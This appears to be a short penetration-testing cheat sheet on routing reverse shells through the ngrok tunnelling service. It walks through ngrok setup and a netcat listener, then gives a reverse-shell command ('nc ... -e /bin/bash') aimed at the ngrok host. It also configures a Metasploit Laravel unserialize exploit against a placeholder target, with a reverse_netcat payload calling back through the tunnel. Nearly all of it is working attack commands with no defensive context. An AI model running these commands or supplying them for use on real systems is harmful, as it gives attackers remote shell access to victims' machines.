ngrok

Ngrok is a globally distributed reverse proxy that secures, protects and accelerates applications and network services.

It can be used as a web hook.

Initial Setup

• Go to https://ngrok.com
• Sign up for free (to do TCP)
• Download ngrok for Linux
• Unzip file and move it to /bin
• Log in and go to the Auth section to obtain a token

# Add authorization key
./ngrok authtoken <your auth key>

Start ngrok

ngrok tcp 4444

Address 0.tcp.ngrok.io:<port> will redirect to listener localhost:4444

Http requests at http://127.0.0.1:4040/inspect/http

Start local listener

nc -nlvp 4444

Test listener

Open a new terminal window to simulate the victim

nc 0.tcp.ngrok.io <ngrok port> -e /bin/bash

In the listener terminal window

ls

Example in Metasploit

msfconsole

use unix/http/laravel_token_unserialize_exec
set RHOSTS x.x.x.x
set RPORT 443
set SSL true
set TARGETURI /
set Payload cmd/unix/reverse_netcat
set LHOST 0.tcp.ngrok.io
set LPORT <ngrok port>

show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS     x.x.x.x          yes       The target host(s), range CIDR...
RPORT      443              yes       The target port (TCP)
SSL        true             no        Negotiate SSL/TLS for outgoing...
TARGETURI  /                yes       Path to target webapp

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  0.tcp.ngrok.io   yes       The listen address...
   LPORT  <ngrok port>     yes       The listen port